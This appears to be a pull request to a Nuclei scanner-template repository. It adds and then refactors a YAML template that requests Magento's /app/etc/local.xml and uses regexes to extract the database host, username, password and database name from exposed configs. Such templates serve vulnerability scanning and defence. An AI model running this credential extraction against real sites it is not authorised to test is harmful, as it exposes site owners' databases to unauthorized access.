### PR TITLE
Adding magento-sensitive-information-disclosure.yaml

### DIFF
--- a/exposures/configs/magento-information-disclosure.yaml
+++ b/exposures/configs/magento-information-disclosure.yaml
@@ -39,30 +39,30 @@ requests:
           - 200
 
     extractors:
-        - type: regex
-          name: Host
-          part: body
-          group: 1
-          regex:
-            - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
+      - type: regex
+        name: Host
+        part: body
+        group: 1
+        regex:
+          - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
 
-        - type: regex
-          name: Username
-          part: body
-          group: 1
-          regex:
-            - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
+      - type: regex
+        name: Username
+        part: body
+        group: 1
+        regex:
+          - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
 
-        - type: regex
-          name: Password
-          part: body
-          group: 1
-          regex:
-            - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
+      - type: regex
+        name: Password
+        part: body
+        group: 1
+        regex:
+          - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
 
-        - type: regex
-          name: DB Name
-          part: body
-          group: 1
-          regex:
-            - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"
+      - type: regex
+        name: DB Name
+        part: body
+        group: 1
+        regex:
+          - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"

--- a/exposures/configs/magento-information-disclosure.yaml
+++ b/exposures/configs/magento-information-disclosure.yaml
@@ -10,7 +10,7 @@ info:
     - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
   metadata:
     verified: true
-  tags: magento,exposure,credentials
+  tags: magento,exposure,credential,config
 
 requests:
   - method: GET
@@ -40,29 +40,10 @@ requests:
 
     extractors:
       - type: regex
-        name: Host
         part: body
         group: 1
         regex:
           - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
-
-      - type: regex
-        name: Username
-        part: body
-        group: 1
-        regex:
           - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
-
-      - type: regex
-        name: Password
-        part: body
-        group: 1
-        regex:
           - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
-
-      - type: regex
-        name: DB Name
-        part: body
-        group: 1
-        regex:
           - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"

--- a/exposures/configs/magento-information-disclosure.yaml
+++ b/exposures/configs/magento-information-disclosure.yaml
@@ -1,14 +1,15 @@
-id: magento-sensitive-information-disclosure
+id: magento-information-disclosure
 
 info:
-  name: Magento Sensitive Information Disclosure (local.xml)
-  author: 
-    - ptonewreckin
-    - danigoland
+  name: Magento - Information Disclosure
+  author: ptonewreckin,danigoland
   severity: high
-  description: Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
+  description: |
+    Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
   reference:
     - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
+  metadata:
+    verified: true
   tags: magento,exposure,credentials
 
 requests:
@@ -18,12 +19,20 @@ requests:
       - "{{BaseURL}}/app/etc/local.xml.additional"
       - "{{BaseURL}}/store/app/etc/local.xml"
 
+    stop-at-first-match: true
     matchers-condition: and
     matchers:
       - type: word
+        part: body
         words:
           - "* Magento"
-        part: body
+          - "<dbname>"
+        condition: and
+
+      - type: word
+        part: header
+        words:
+          - "application/xml"
 
       - type: status
         status:
@@ -31,28 +40,28 @@ requests:
 
     extractors:
         - type: regex
-          name: "Host"
+          name: Host
           part: body
           group: 1
           regex:
             - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
 
         - type: regex
-          name: "Username"
+          name: Username
           part: body
           group: 1
           regex:
             - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
 
         - type: regex
-          name: "Password"
+          name: Password
           part: body
           group: 1
           regex:
             - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
 
         - type: regex
-          name: "DB Name"
+          name: DB Name
           part: body
           group: 1
           regex:

--- a/exposures/configs/magento-sensitive-information-disclosure.yaml
+++ b/exposures/configs/magento-sensitive-information-disclosure.yaml
@@ -1,0 +1,59 @@
+id: magento-sensitive-information-disclosure
+
+info:
+  name: Magento Sensitive Information Disclosure (local.xml)
+  author: 
+    - ptonewreckin
+    - danigoland
+  severity: high
+  description: Misconfigured instances of Magento may disclose usernames, passwords, and database configurations via /app/etc/local.xml
+  reference:
+    - https://github.com/ptonewreckin/cmsDetector/blob/master/signatures/magento.py
+  tags: magento,exposure,credentials
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/app/etc/local.xml"
+      - "{{BaseURL}}/app/etc/local.xml.additional"
+      - "{{BaseURL}}/store/app/etc/local.xml"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "* Magento"
+        part: body
+
+      - type: status
+        status:
+          - 200
+
+    extractors:
+        - type: regex
+          name: "Host"
+          part: body
+          group: 1
+          regex:
+            - "<host><!\\[CDATA\\[(.+)\\]\\]><\\/host>"
+
+        - type: regex
+          name: "Username"
+          part: body
+          group: 1
+          regex:
+            - "<username><!\\[CDATA\\[(.+)\\]\\]><\\/username>"
+
+        - type: regex
+          name: "Password"
+          part: body
+          group: 1
+          regex:
+            - "<password><!\\[CDATA\\[(.+)\\]\\]><\\/password>"
+
+        - type: regex
+          name: "DB Name"
+          part: body
+          group: 1
+          regex:
+            - "<dbname><!\\[CDATA\\[(.+)\\]\\]><\\/dbname>"


### PR DESCRIPTION
### Template / PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
Enables the identification and extraction of credentials from misconfigured instances of Magento CMS

### Template Validation

I've validated this template locally?
- [X] YES
- [ ] NO

#### Additional Details (leave it blank if not applicable)
![magento-sensitive-information-disclosure-img](https://user-images.githubusercontent.com/6384896/185732863-50ceeaea-55ab-4978-8bb0-6ea8cc34b3d6.jpg)

<!-- Include Shodan / Fofa / Google Query / Docker / Screenshots if available -->
<!-- Include HTTP/TCP/DNS Matched response data snippet if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://nuclei.projectdiscovery.io/templating-guide/)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)